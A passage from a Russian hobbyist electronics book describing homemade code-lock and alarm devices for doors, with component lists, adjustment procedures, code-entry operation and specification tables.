Как следует из схемы, в данном сторожевом устройстве при неправильном наборе кода сигнал тревоги не предусмотрен, так как замок без набора кода просто не открыть. Конструкция сторожевого устройства и стопора в замке может быть выполнена домашним мастером в нескольких вариантах. Суть стопорения подвижного язычка механического замка состоит в том, что в замке устанавливается дополнительный упор, который препятствует открыванию и который вытягивается из углубления язычка замка при срабатывании электромагнита (ИМ). Эти упоры могут быть установлены как на наружной части (крышке) замка, так и внутри его конструкции. Например, можно выполнить сам стопор в виде штыря, конец которого входит в отверстие подвижной части механического замка. Это отверстие можно просверлить по месту установки электромагнита или электромагнитного реле.

При изготовлении сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К155ТМ2, DA2 — К155ЛА12, DA3 — К155ИЕ5, DA4 — К155ИЕ5, DA5 — К155ИД4, DA6 — К155КП7; транзисторы VT1 типа КТ342А, VT2 — П214В, VT3 — КТ315Б, VT4 — КТ814А;

выпрямительные диоды VD1—VD4 типа КД105, VD5 - VD8 — Д226; стабилитроны VD9 типа Д809, VDIO — Д814Г, VD11 — Д814Г; конденсаторы С1 типа МБМ-П-6308-0,1 мкФ, С2 — МБМ-П-бЗ0В-0,1 мкФ, СЗ — К50-6-16В-500 мкФ, С4 — К50-6-10В-100 мкФ, С7 — К10-17-25В-Н90-0.68 мкФ, С5 — К50-6-6.3В-20 мкФ, С6 — К10-17-25В-ПЗЗ-220 пФ; резисторы R1 типа МЛТ-2-6,8 Ом, R2 — МЛТ-0,25-3,9 кОм, R3 — МЛТ-0,25-100 Ом, R4 — МЛТ-0,25-750 Ом, R5 — МЛТ-0,5-220 Ом, R6 — МЛТ-1-2,2 кОм, R7 — МЛТ-0,125-1 кОм, R8 — МЛТ-0,125-22 кОм, R9 — МЛТ-0,125-5,6 кОм, R10 — МЛТ-0,125-100 кОм, R11—МЛТ-0,125-1 кОм, R12 — МЛТ-0,25-330 Ом, R13 — МЛТ-0,5-330 Ом, R14 — МЛТ-0,125-10 кОм; светодиод VD13 типа АЛ102А; электромагнитные реле К1 типа РЭС-10 (паспорт РС4.524.303) или РЭС-15 (паспорт РС4.591.003), К2 — РЭС-10 (паспорт РС4.524.302) или РЭС-15(паспорт РС4.591.004), КЗ — РКН (паспорт РС4.500.100);

индикаторная лампа H1 типа К6-60; плавкий предохранитель F1 типа ПМ-1-0.25А; сетевой понижающий трансформатор питания Т1 типа ШЛ броневой конструкции (ТН 17-127/220-50);

электрический соединитель X1 типа «вилка», смонтированный с электрическим кабелем; переключатели S1 типа П1Т-1-1, SB1 — МП-1; ХИТ GB1 типа 373 или 373А (6 шт).

При изготовлении электронного блока сторожевого устройства можно применить другие комплектующие ЭРИ и ЭРЭ. Например, резисторы типа МЛТ можно заменить на резисторы типов ОМЛТ, МТ, ВСа, ВС, C1-4, C2-8, УЛИ; конденсаторы типа К50-6 — на К50-3, К50-6А, К50-12, К50-16, К50-20, изменив способ их крепления на монтажной плате; выпрямительные диоды типа КД105 — на КД103А, КД109А, КД202А, Д105А, диоды типа Д226 — на Д226Г, Д226Д, КД109А; стабилитрон типа Д809 — на Д810, Д814Б, Д814В; транзистор типа КТ342А — на КТ342Б, КТ342В, КТ342Г, КТ301В, КТ312Б, КТ315В, КТ315Г, транзистор типа П214В — на П214А, П215Б, П215, П314Г; переключатель типа «тумблер» — на кнопочные типа П2К.

Налаживание и регулировка сторожевого устройства должны осуществляться последовательно. Все элементы схемы перед установкой на место должны быть проверены на соответствие требованиям ТУ и иметь параметры в пределах допусков, разрешенных ТД или указанных на схеме.

Регулировку и налаживание сторожевого устройства лучше всего осуществлять поблочно, при отключенной нагрузке. Сначала проверяется напряжение холостого хода на вторичных обмотках трансформатора питания Т1, затем — величина тока через стабилитрон VD11 подбором величины сопротивления резистора R5. Ток должен быть в пределах 16...22 мА. Далее подбором сопротивления резистора R1 устанавливают ток срабатывания защиты от перегрузок и коротких замыканий в выходных цепях электронного блока. Эту проверку производят при питании сторожевого устройства от сети переменного тока, при отключенном ХИТ. Иногда приходится заменять стабилитрон VD11 из-за разброса параметров, для того чтобы на выходе в точках А и Б действовало напряжение 9...10 В.

Проверка основной части электрической схемы сторожевого устройства осуществляется в собранном виде, при котором должен обеспечиваться заданный порядок срабатывания набранного шифра. Небольшая тренировка включения и своевременного выключения ИМ (стопора замка) в любом случае необходима для того, чтобы обеспечить его надежную эксплуатацию.

Важным условием долговечной работы сторожевого устройства является качественный электромонтаж проверенных ЭРИ и ЭРЭ. Пайку элементов необходимо выполнять оловянно-свинцовым припоем марки ПОС-40 или ПОС-60 паяльником мощностью не более 25 Вт.

Все комплектующие ЭРЭ основной принципиальной схемы устройства размещают на плате, изготовленной из односторонне фольгированного стеклотекстолита или гетинакса толщиной не менее 1,5 мм.

Проследим порядок открывания механизма замка сторожевого устройства при работе его от сети переменного тока и после установки кода 66112233, как указано на принципиальной схеме с перемычками между мультиплексором и дешифратором. В исходном состоянии при включенном электропитании все элементы счетно-решающего устройства подготовлены к работе и находятся в режиме ожидания. После нажатия на кнопку SB1 и замыкания ее контактов примерно через полсекунды должны произойти первое включение светодиода и передача импульса тока с выхода мультиплексора (вывод 6) ИМС DA6, на котором появляется высокий уровень логической единицы, на вход триггера ИМС DA2 (вывод 2). Заметим, что первый сигнал соответствует цифре 1, а правильно должна быть набрана цифра 6. Одновременно при включении светодиода на выходе счетчика ИМС DA3 (вывод 9) действует низкий уровень логического нуля, а при выключении здесь появляется высокий уровень логической единицы и открывается выход дешифратора ИМС DA5 (вывод 10).

Через 0,5 с произойдет второе зажигание светодиода, если кнопка переключателя SB1 оставалась в нажатом состоянии и ее контакты были замкнуты, появляется низкий уровень логического нуля на выходе дешифратора ИМС DA5 (но уже на выводе 11), и он останется открытым до третьего включения светодиода НL1. Затем через 0,5 с происходит третье включение, и так до шестого зажигания светодиода, перед которым становится открытым последующий выход ИМС DA5 (вывод 6), соединенный проволочной перемычкой с выводом 4 ИМС DA6, так как на нем действует низкий уровень логического нуля. Теперь на выходе ИМС DA6 (вывод 6) будет действовать также низкий уровень логического нуля, который переключит триггер ИМС DA1 (вывод 2) в исходное состояние, так как набрана правильная цифра 6 кода, и если в этот момент кнопку отпустить, то счетчик DA4 устанавливается в кодовое состояние, а в ИМС DA6 открывается следующий вход (вывод 3).

Следующая правильная цифра опять 6. Значит, набирая цифру 6, контакты переключающей кнопки SB1 необходимо разомкнуть в момент шестого вспыхивания светодиода HL1. Исполнительный механизм ЭМ1 сработает только после правильного набора всего восьмиразрядного кода в момент последнего выключения контактов переключателя SB1.

Конструктивно сторожевое устройство выполняется в виде функциональных узлов, заключенных в общий прямоугольный корпус с лицевой панелью, на которую выведены все основные ручки управления, предохранитель и индикаторы. Первый функциональный узел устройства представляет собой СИП, область применения которого может быть расширена, если выполнить его самостоятельной сборочной единицей. Значительный интерес для радиолюбителей может представлять БП, так как его можно использовать, например, для зарядки маломощных аккумуляторных батарей и элементов, для электропитания РЭА. Поэтому целесообразно на лицевую панель устройства вывести клеммы этого источника питания и в периоды между прямым выполнением функций использовать напряжение постоянного тока 9 и 5 В с общим выводом для питания различной бытовой аппаратуры и приборов.

Желательно также около всех элементов на лицевой панели сделать надписи, обозначающие их функциональные назначения. Лучше это делать гравировкой. На верхней крышке устройства необходимо предусмотреть вентиляционные отверстия, расположение и размеры которых определяются местом установки тепловыделяющих элементов на печатной плате и шасси: трансформатора питания Т1, выпрямительных диодов и регулирующего транзистора.

Электронный блок сторожевого устройства может быть установлен в любом месте охраняемого помещения, но обязательно на открытом и легкодоступном месте, где можно производить его техническое обслуживание. В не рабочем состоянии сторожевое устройство должно быть отключено от питающей сети, а механический стопор подвижного язычка замка установлен в положение, при котором обеспечивается свободное открывание замка обычным ключом.

При использовании устройства для многофункциональных целей в электрическую принципиальную схему должны быть внесены изменения в части включения в нее ИП, определяющих напряжение питания нагрузки и потребляемый этой нагрузкой постоянный ток. Это особенно важно при зарядке аккумуляторных батарей и элементов, при восстановлении и «лечении» различных ХИТ. В качестве ИП могут быть рекомендованы приборы 2-го класса точности типа М4200.

В устройстве можно применить электромагнит типа ЭКЗ-4-10, используемый в замках промышленного производства и устанавливаемый на входных дверях жилых помещений.

Основные электрические параметры и технические характеристики сторожевого устройства с однокнопочным управлением

Номинальное напряжение питающей сети переменного тока, В .................... 220 или 127

Номинальная частота питающей сети неременного тока, Гц .................... 50

Номинальные стабилизированные напряжения автономного источника питания, В:

для питания электронных цепей ........... 9

для питания ИМС .................... 5

Пределы изменения напряжения питающей сети

переменного тока, В .................... 180...240 или

110... 140

Пределы изменения частоты питающей сети

переменного тока, Гц.................... 49... 51

Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более .............. 12

Пределы изменения напряжения постоянного тока, В.. 8... 12 и 4, 6... 6,1 Максимальная мощность, потребляемая устройством

от сети в режиме холостого хода, мВт ........ .12

Мощность, потребляемая устройством н рабочем

режиме эксплуатации, Вт, не более........... 15

Ток, потребляемый устройством н рабочем режиме,

мА, не более.......................... I50

Ток срабатывания защиты при коротком замыкании,

мА, не менее.......................... 170

Ток холостого хода, мА, не более.............. 8

Время срабатывания защитного устройства

от перегрузок с, не более ................ .0,1

Частота, вырабатываемая тактовым генератором

импульсов, Гц ........................ .2

Время между вспышками светодиода, с ........ .0,5

Число охраняемых объектов, шт .............. 1

Количество возможных сочетаний программируемого

кода устройства, шт .................... .40 320

Количество кодируемых цифр, шт ............ .8

Время готовности устройства к эксплуатации

после включения питания, мс .............. .0,2

Напряжение переменного тока на выводах

вторичных обмоток трансформатора, В:

7 и 8 . ............................ .6.3

9 и 10 ............................ .5

9 и 11............................ .6,3

12 и 13 ........................... .5

12 и 14 ........................... .6,3

Амплитуда пульсации выпрямленного напряжения

постоянного тока, мВ, не более:

5В .............................. .0,18

9В .............................. .0,12

Срок службы, ч, не менее ................. .8000

Вероятность безотказной работы устройства

при риске заказчика в=0,9, не менее ........ .0,98

Сопротивление изоляции токоведущих частей

устройства, МОм, не менее ................ 10

Помехозащищенность устройства при воздействии

внешнего электромагнитного поля, дБ, не менее . .100 кпд, %, не менее ....................... .90 t21.jpg

Рис. 3.7. Принципиальная схема электронного сторожевого устройства с однокнопочным управлением.

 

Рис. 3.7. Принципиальная схема электронного сторожевого устройства с однокнопочным управлением.

Изображение: 

Таблица 3. 8. Порядок соединений контактов при кодировании и считывании кода

Изображение: 

Таблица 3.7. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном сторожевом устройстве с

Изображение: 

3. 4. Электронное сторожевое устройство на шести интегальных микросхемах

3.4. ЭЛЕКТРОННОЕ СТОРОЖЕВОЕ УСТРОЙСТВО НА ШЕСТИ ИНТЕГРАЛЬНЫХ МИКРОСХЕМАХ

Высоконадежное сторожевое устройство, собранное на шести ИМС, относится к электронным устройствам средней сложности и разработано для применения в условиях УХЛ, ХЛ или В. Сторожевое устройство рассчитано на жесткие условия эксплуатации при температуре окружающей среды от —40 до 50 °С, относительной влажности воздуха до 95% при температуре 25 °С, при воздействии инея и росы и пониженного атмосферного давления воздуха до 5мм рт. ст.

Устройство может быть применено для установки как на внутренних, так и на наружных дверях жилых, производственных и хозяйственных помещений. Область его использования может быть расширена без значительных доработок для запирания дверей и въездных ворот гаражей, складских помещений и хозпостроек на садово-огородных участках. Надежность и долговечность устройства обеспечивается достаточно простым схемно-техническим решением и современным конструктивно-технологическим исполнением. Технологичность сторожевого устройства определяется оснащением радиолюбительской лаборатории необходимыми приборами и инструментами.

Электронная схема сторожевого устройства является по существу неотъемлемой частью системы охраны, в которую дополнительно входят механический замок врезной или накладной конструкции со стопором защелки, ИМ, приводимый в действие от электромагнита или соленоида или от электромеханического реле, и в ряде случаев устройство управления стопором защелки.

Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50 Гц, ХИТ или другого источника электропитания постоянного тока, в том числе и собранного по рекомендациям, изложенным выше. Напряжение постоянного тока не превышает 12 В, номинальное напряжение — 9В.

Принципиальная электрическая схема сторожевого устройства на шести ИМС приведена на рис. 3.8. Как следует из схемы, устройство содержит в своем составе входные цепи с емкостным фильтром, защищающим от помех, которые проникают в сеть переменного тока; сетевой понижающий трансформатор питания Т1; выпрямитель нерегулируемого типа, работающий на емкостный фильтр; стабилизатор напряжения постоянного тока; кодирующее звено; счетно-решающее устройство с системой управления; ИМ дискретного действия.

Входное устройство обеспечивает подключение к сети переменного тока с помощью электрического соединителя X1 и сетевой розетки; предохранение первичных цепей устройства от перегрузок и коротких замыканий с помощью плавкого предохранителя F1, рассчитанного на максимальный ток 0,25А; общее отключение питания при нештатных ситуациях и включение устройства в эксплуатацию с помощью переключателя типа «тумблер» или П2К, — S1. На входе устройства собран емкостный фильтр на конденсаторах С1 и С'2, защищающий от низкочастотных помех, которые могут проникнуть в сеть питания.

В качестве сетевого понижающего трансформатора питания Т1 в сторожевом устройстве может быть использован унифицированный трансформатор типа ТН, габаритная мощность которого равна 20 Вт. Конструкция покупного трансформатора обеспечивает повышенный уровень влагозащищенности и электрической прочности. Соединения выводов обмоток трансформатора при подключении к сети переменного тока даны в табл. 3.9.

Таблица 3.9. Соединения выводов обмоток сетевого понижающего трансформатора питания Т1

3-41.jpg

В устройстве может быть применен самодельный трансформатор питания, рассчитанный на подключение к сети переменного тока напряжением только 220 В и изготовленный по упрощенной схеме, с одной первичной и двумя вторичными обмотками, одна из которых имеет отвод от средней точки. Моточные данные самодельного трансформатора приведены в табл.3.10. Трансформатор питания изготавливается с одной катушкой на броневом магнитопроводе типа УШ (Ш или ШЛ). В конструкции может быть использован также магнитопровод с размерами, позволяющими уменьшить расход меди, типа ШЛМ. Активная площадь поперечного сечения стали центрального стержня магнитопровода должна быть не менее 6 см2.

Таблица 3. 10. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном сторожевом устройстве на шести интегральных микросхемах

3-42.jpg

Намотка провода на катушку должна осуществляться рядовым способом, виток к витку, с изоляцией каждого слоя и пропиткой нитролаками. Между первичной и вторичными обмотками делается усиленная изоляция и наматывается слой обмоточного провода, один вывод которого замыкается на магнитопровод. Слой обмоточного провода является экраном. Самодельный трансформатор рекомендуется закрыть металлическим кожухом, изготавливаемым из жести или электротехнической стали и дополнительно защищающим обмоточный провод катушки.

Понижающий трансформатор питания обеспечивает полную гальваническую развязку вторичных цепей электронной схемы от сети переменного тока высокого напряжения, заданные значения выпрямленного напряжения постоянного тока, достаточно безопасную регулировку устройства, так как на выходе действует пониженное напряжение.

Выпрямительное устройство собрано на двух маломощных диодах по двухполупериодной схеме со средним выводом вторичной обмотки, которая чаще применяется в маломощных БП. По сравнению с однофазной мостовой схемой она позволяет уменьшить вдвое число диодов и тем самым понизить потери. Выпрямители, собранные по этой схеме, характеризуются повышенной частотой пульсации, возможностью использования вентилей с общим катодом (или анодом), что упрощает их установку на общем радиаторе, а также повышенным обратным напряжением на комплекте выпрямительных диодов и более сложной конструкцией трансформатора. Работает выпрямитель на емкостный фильтр, выполненный на конденсаторе С5. Схема выпрямителя позволяет получить на выходе напряжение питания с высокими техническими параметрами, обеспечивающими точное срабатывание системы защиты и четкую работу схемы сторожевого устройства. Выпрямленное напряжение поступает на полупроводниковый стабилизатор с защитой от перегрузок и коротких замыканий в цепях сторожевого устройства.

Включенный на входе устройства плавкий предохранитель F1 не всегда надежно защищает устройство от перегрузок и коротких замыканий, которые наиболее часто возникают из-за ошибок, допускаемых начинающими радиолюбителями и юными техниками. Для повышения надежности работы сторожевого устройства в БП введена электронная защита, которая собрана на стабилитроне VD3, транзисторе VT1 и резисторах R1 и R3. Работает защитное устройство следующим образом. На выходе выпрямителя включен проволочный резистор R3, через который протекает ток нагрузки и на котором падает небольшое напряжение, управляющее работой транзистора VT1. Заметим, что напряжение на этом транзисторе стабилизировано полупроводниковым стабилитроном VD3, включенным в прямом направлении. Ток нагрузки, протекающий через резистор R3, действует между базой и эмиттером, и разность напряжений между ними определяет состояние этого транзистора. Если ток нагрузки ниже допустимого, который определяется параметрами ЭРЭ, то транзистор остается закрытым. Когда же ток нагрузки резко увеличивается и превышает допустимый, падение напряжения на резисторе R3 становится таким, что транзистор VT1 открывается. При этом параллельно переходу база — коллектор включенный стабилитрон VD4 фактически шунтируется, так как через этот переход ответвляется часть электрического тока, а это приводит к ограничению тока, протекающего через регулирующий транзистор VT3 стабилизатора напряжения. В результате напряжение на нагрузку не поступает и сторожевое устройство обесточивается. Защитное устройство можно настроить на ток срабатывания 300 мА и более.

Важнейшим условием четкой работы сторожевого устройства и электронной схемы является использование проверенных и абсолютно исправных комплектующих ЭРИ и ЭРЭ, а также технологически правильного монтажа микросхем на печатной плате. При монтаже должен использоваться только низковольтный маломощный паяльник с тонким жалом и регулируемой температурой нагрева. В общем случае существующие правила формовки выводов и установки ИМС в электромонтажной схеме могут быть определены следующим образом:

1. Длина выводов ИМС должна быть не менее 15 мм после подрезки и формовки в соответствии с ТУ.

2. Использование высокотемпературных припоев не допускается.

3. При припайке каждого вывода ИМС должен использоваться металлический теплоотвод (в обычном случае это пинцет).

4. Время нагрева отдельных выводов ИМС при пайке не должно превышать 1...2 с.

5. Места на печатной плате перед установкой ИМС должны быть тщательно подготовлены.

6. Демонтаж ИМС допускается не более двух раз. Следует отметить, что только правильное соединение элементов схемы, и особенно шифровального устройства, позволит работать сторожевому устройству без сбоев.

Кодирование устройства осуществляется методом установления перемычек между выводами выходных контактов ИМС DA5 и DA6, образующих мультиплексор. Так как конструкция сторожевого устройства не сопровождается комплектом КД и ТД и полностью зависит от выполнения рекомендаций и возможностей радиолюбителя, а также от материального оснащения домашней мастерской, то необходимо наиболее удобно сконструировать и изготовить узел кодировочного поля. Наиболее целесообразно использовать такие элементы, как унифицированные малогабаритные зажимы или приборные контакты с пружинными и винтовыми зажимами. Эти контакты удобно расположить на лицевой панели сторожевого устройства, в котором собрана электронная схема. Монтаж ЭРИ и ЭРЭ осуществляется комбинированным способом с применением печатного и объемного монтажа. Печатная плата изготавливается из односторонне фольгированного стеклотекстолита или гетинакса толщиной 1,5..2 мм.

Как следует из схемы, набор шифра сторожевого устройства осуществляется на шифровальном поле соединением контактов А1—А8 с контактами Б1—Б8 в комбинациях любых цифр от 1 до 8. Восьмиразрядный код позволяет получить более 40000 сочетаний кода, который набрать простым перебором цифр практически не представляется возможным. Шифр выполняется установлением перемычек между выводами ИМС. Для правильного набора кода необходимо одну из двух линеек с контактными зажимами обозначить цифрами, которые и определяют не только восьмиразрядный код, но и порядок счета при замыкании контактов переключателя SB1.

Если соединить контакты А1 с Б2, А2 с Б1, A3 с БЗ, A3 с Б4, А6 с Б5, А7 с Б6, А7 с Б7, А8 с Б8, то закодированное число шифра будет 12336778.

В основном электронном блоке можно выделить следующие функциональные элементы: на двух ИМС DA5 и DA6 собран мультиплексор; счетчик-дешифратор собран на ИМС DA4; тактовый генератор выполнен на ИМС DA1 (выводы 1, 2, 3 и 11, 12, 13); счетчик выполнен на ИМС DA3; определитель типа И собран на диодах VD7—VD14 и резисторе R16 и имеет восемь разрядов.

Порядок считывания цифр кода производится автоматически с контактов, которые смонтированы на шифровальной планке Б, цифры кода задаются вручную подключением перемычек с шифровальной планки А. Например, если код имеет вид 55555555, то необходимо контакты А5 соединить последовательно со всеми контактами планки Б.

Для изготовления сторожевого устройства использованы следующие покупные комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К176ЛА7, DA2 — К176ЛЕ5, DA3 — К176ИЕ8, DA4 — К176ИЕ8, DA5 — К176ЛА7, DA6 — К176ЛА7; транзисторы VT1 типа МП42, VT2 — МП42, VT3 — П213, VT4 — КТ315Б VT5 — КТ315Б, VT6 — КТ814А; диоды VD1 типа Д226Д, VD2 — Д226Д, VD6 — Д226Е, VD7—VD14 — КД513А; стабилитроны VD3 типа Д814Д, VD4 — Д814Д; светодиод VD5 типа АЛ102А;

конденсаторы С1 типа МБМ-11-750В-0.025 мкФ, С2 — МБМ-П-750В-0.025 мкФ, СЗ — К42У-2-160В-2200 пФ, С4 — К10-7В-50В-Н30-2200 пФ, С5 — К50-6-25В-500 мкФ, С6 — К50-6-25В-500 мкФ, С7 - К10-17-50В-22 пФ, С8 — К73-17-63В-0, 1 мкФ, С9 — К10-17-50В-1000 пФ, С10 — КМ-6-25В-0,033 мкФ, С11— КМ-6-25В-0,033 мкФ; резисторы R1 типа ВСа-0,5-620 Ом, R2 — ВСа-0,25-750 Ом, R3 — проволочный самодельный 3 Ом (намотанный на резисторе ВСа-2-10 Ом константановым или нихромовым проводом), R4 — ВСа-0,5-1,2 кОм, R5 СП4-1-0,5Вт-А-2,2 кОм, R6 — ВСа-0.5-4,3 кОм, R7 — ВСа-0.5-2,4 кОм, R8 — ВСа-2-10 к0м,R9-ВСа-0,125-10кОм, R10-Bса-0,125-3,0МОм,R11— ВСа-0,125-100 кОм, R12 — ВСа-0,12-100 кОм, R13 — ВСа-0,5-330 Ом, R14 -ВСа-0,125-47 кОм, R15 - ВСа-0,25-1,2 кОм, R16 -ВСа-0,25-100 кОм; сетевой понижающий трансформатор питания T1типа ТН 14-127/220-50; электрический соединитель X1 типа «вилка»; предохранитель плавкий F1 типа ПМ-1-0,25 А;

лампа индикаторная H1 типа МН-6,3-0,22 А; переключатели SI типа «тумблер» ТВ2-1-2, SB1 — КМ1-1; ИМ К1 (электромагнит или электромагнитное реле типа РКН).

Раскодирование и подача команды на срабатывание ИМ сторожевого устройства производится с помощью правильного набора кода при замыкании контактов переключателя SB1. При нажатии на кнопку этого переключателя начинает работать счетчик импульсов и вспыхивать светодиод VD5. Если нужно набрать, например, код, состоящий из цифр 57331844, то для набора первой цифры светодиод должен вспыхнуть пять раз, после чего кнопка переключателя SB1 должна быть отпущена. При следующем нажатии на кнопку светодиод должен вспыхнуть семь раз и кнопка вновь должна быть отпущена. Таким образом набираются все восемь цифр кода. Если все цифры кода будут набраны правильно, то последним откроется транзистор VT6 и сработает исполнительное реле К.1.

При регулировке сторожевого устройства можно использовать другие аналогичные ЭРИ и ЭРЭ, не ухудшающие его основные электрические параметры и технические характеристики. Например, вместо стабилитрона типа Д814Д можно использовать любой стабилитрон из серий Д808—Д814. Резистор R3 можно намотать проводом с высоким удельным сопротивлением на корпусе перегоревшего предохранителя. Вместо резисторов типа ВСа можно использовать резисторы типов МТ, МЛТ, ОМЛТ, C1-4, C2-11, БЛП, БЛПа. В качестве ИМ можно использовать электромагнит или соленоид, описание которых приведено выше, а также электромагнитные реле типа РЭН-18 (паспорт РХ4.564.706), РКН (паспорт РС4.500.100), РСМ (паспорт РФ4.500.031). Налаживание сторожевого устройства начинается с БП. Сначала проверяется действующее напряжение на выходных обмотках сетевого трансформатора Т1, затем — на выходе выпрямителя и стабилизатора напряжения в точках А и Б. Здесь напряжение постоянного тока должно быть в пределах 8,5...12 В. Эту проверку рекомендуется выполнять при отключенной в точках А и Б нагрузке. После данной проверки устанавливается ток срабатывания защиты от перегрузок и коротких замыканий. Налаживание защиты сводится к подбору сопротивления резистора R3 — его сопротивление должно быть таким, чтобы защита срабатывала при токе нагрузки 350 мА.

В электронном блоке сторожевого устройства производится подбор резисторов усилителя тока ИМ (R9, R13) для обеспечения необходимого тока срабатывания.

Основные электрические параметры и технические характеристики электронного сторожевого устройства на шести микросхемах

Номинальное напряжение питающей сети

переменного тока, В .................... .220 или 127

Номинальная частота питающей сети

переменного тока, Гц ................... .50

Номинальное напряжение автономного источника

электропитания постоянного тока, подключаемого

в точках А и Б, В ..................... .9

Пределы изменения напряжения питающей сети

переменного тока, В .................... .180...242 или

110...140 Пределы изменения частоты питающей сети

переменного тока, Гц ................... .49...51

Пределы изменения напряжения электропитания

постоянного тока автономного источника, В .... .8,5...12 Коэффициент нелинейных искажений питающей сети

переменного тока, %, не более .............. .12

Амплитуда пульсации выпрямленного напряжения

постоянного тока на выходе выпрямителя, мВ,

не более ............................ .20

Коэффициент стабилизации, не менее .......... .100

Длительность вспышек светодиода при наборе кода

и замкнутых контактах переключателя SB1, с,

не менее ............................ .0,5

Вероятность подбора кода, не менее ........... .10^(-8)

Номинальное количество цифр в коде .......... .8

Разрядность счетчика импульсов .............. .8

Максимальная мощность, потребляемая устройством

от сети,Вт ........................... 18

Ток, потребляемый устройством в рабочем

режиме, мА, не более ................... .300

Ток срабатывания защиты при перегрузках

и коротких замыканиях, мА, не менее......... 350

Время срабатывания защиты при коротком

замыкании ,с, не более ................... .0,1

Ток холостого хода, мА, не более .............. 10

Рабочая частота, вырабатываемая тактовым

генератором импульсов. Гц ............... .2

Время между вспышками светодиода при замкнутых

контактах переключателя SB1, с ........... . .0,5...1

Число одновременно охраняемых объектов, шт .... .1

Готовность устройства к эксплуатации

после включения напряжения, мс, не более ..... .0,5

Вероятность безотказной работы сторожевого устройств при риске заказчика в=0,92, не менее .... .0,97

Срок службы, ч, не менее .................. 10 000

Сопротивление изоляции токоведущих частей

устройства, МОм, не менее ................ 10

Помехозащищенность устройства при воздействии

внешнего электромагнитного поля, дБ, не менее . .100 кпд, %, не менее ....................... .95

Условия эксплуатации:

температура окружающей среды, °С ........ .—40...+50

относительная влажность воздуха при температуре 25 С, %, не более .................. .93±2

атмосферное давление воздуха, мм рт. ст. .... .200...1000

t31.jpg

Рис. 3. 8. Принципиальная схема электронного сторожевого устройства на шести интегральных микросхемах.

Рис. 3.8. Принципиальная схема электронного сторожевого устройства на шести интегральных микросхемах.

Изображение: 

Таблица 3. 10. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном сторожевом устройстве

Изображение: 

Таблица 3.9. Соединения выводов обмоток сетевого понижающего трансформатора питания Т1

Изображение: 

3. 5. Сторожевое устройство на ППП со световой и звуковой сигнализацией

3.5. СТОРОЖЕВОЕ УСТРОЙСТВО НА ППП СО СВЕТОВОЙ И ЗВУКОВОЙ СИГНАЛИЗАЦИЕЙ

Сторожевое устройство на полупроводниках разработано для охраны объектов народно-хозяйственного назначения, дачных строений, хозблоков на садово-огородных участках, гаражей, жилых помещений в условиях УХЛ, ХЛ и В, при установке исполнительных механизмов на входных дверях, окнах, воротах и по периметру ограждений, которые рассчитаны на эксплуатацию как внутри объектов, так и на открытых площадях. Радиолюбителям необходимо так сконструировать сторожевое устройство, чтобы была обеспечена высокая технологичность изготовления и устройство могло бы противостоять разнообразным внешним воздействующим нагрузкам. Изделия промышленного изготовления устойчиво работают при смене температур и повышенной относительной влажности до 95%, а также при пониженном атмосферном давлении до 5 мм рт. ст. Такие условия эксплуатации обеспечиваются высоким качеством применяемых комплектующих ЭРИ и ЭРЭ и достаточно простым схемно-техническим решением.

Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50Гц.Электронная схема данного устройства допускает электропитание от вторичного источника питания напряжением 16...24 В.

Область применения этого сторожевого устройства может быть значительно расширена, если внести некоторые изменения в схему питания и использовать его для охраны подвижных большегрузных средств, работающих на суше и на воде (реках, озерах и морях). Но лучшее применение — все-таки для охраны стационарных объектов на приусадебных участках.

Принципиальная электрическая схема устройства, собранного на ППП со световой и звуковой сигнализацией, приведена на рис. 3.9.

Сторожевое устройство представляет собой совокупность нескольких функциональных узлов и блоков, объединенных в универсальную охранную систему. Как видно из электрической схемы, она состоит из входных электрических цепей, сетевого понижающего трансформатора питания Т1, выпрямительного устройства, работающего на емкостный фильтр, стабилизатора напряжения, быстродействующего электронного блока охранной сигнализации и выходных цепей с исполнительными устройствами автоматического действия.

Подключается устройство к сети переменного тока с помощью стандартного электрического соединителя X1 типа «вилка», которая в свою очередь подключается к штепсельной розетке. На входе устройства установлен плавкий предохранитель F1, защищающий ЭРЭ входных цепей от перегрузок и коротких замыканий. Предохранитель рассчитан на максимальный ток срабатывания 0,25 А. Включение и выключение охранной сигнализации обеспечивается однополюсным переключателем S1 типа «тумблер». Включенный параллельно первичной обмотке сетевого трансформатора, высоковольтный конденсатор С1 защищает систему электронной сигнализации от сетевых помех.

В качестве сетевого понижающего трансформатора питания Т1 применен унифицированный трансформатор типа ТА, который может быть заменен трансформатором самодельной конструкции. Можно применить трансформатор типоразмера ТА62-127/220-50 с двумя первичными и шестью вторичными обмотками. Самодельный трансформатор изготавливается на броневом магнитопроводе типа Ш или ШЛ (ШЛМ) из электротехнической стали марки 3312. Активная площадь поперечного сечения стали основного стержня магнитопровода должна быть в пределах 5...6 см2 Следует заметить, что чем больше активная площадь поперечного сечения стали, тем больше габаритная мощность трансформатора. Моточные данные самодельного трансформатора Т1 приведены в табл. 3.11. При изготовлении этого трансформатора можно намотать на каркас катушки только действующие обмотки, не повторяя конструкцию унифицированного трансформатора. На каркас катушки наматывается одна первичная и две вторичные обмотки, между которыми укладывается через изоляционные прокладки один ряд обмоточного провода виток к витку, выполняющего роль экрана, который обеспечит защиту выходных цепей от электромагнитных помех. Один конец экранного провода заземляется на магнитопровод.

Таблица 3.11. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сторожевом устройстве на ППП со световой и звуковой сигнализацией

3-51.jpg

Согласно схеме, для подключения выпрямителя используются две обмотки сетевого трансформатора Т1 с выводами 19 и 20, 21 и 22. Выводы обмоток 20 и 21 соединяются между собой, а однофазная двухполупериодная схема выпрямителя подключается к выводам 19 и 22, на которых действует переменное напряжение 22 В. Коэффициент трансформации при этом равен 10. При включении унифицированного трансформатора в сеть переменного тока напряжением 220 В выводы 2 и 6 соединяются между собой, а напряжение питания электрической сети подается на выводы 1 и 8. Если в сторожевом устройстве будет применен другой трансформатор, например серии ТПП или ТС, то подключение его к сети должно осуществляться согласно схеме этого трансформатора.

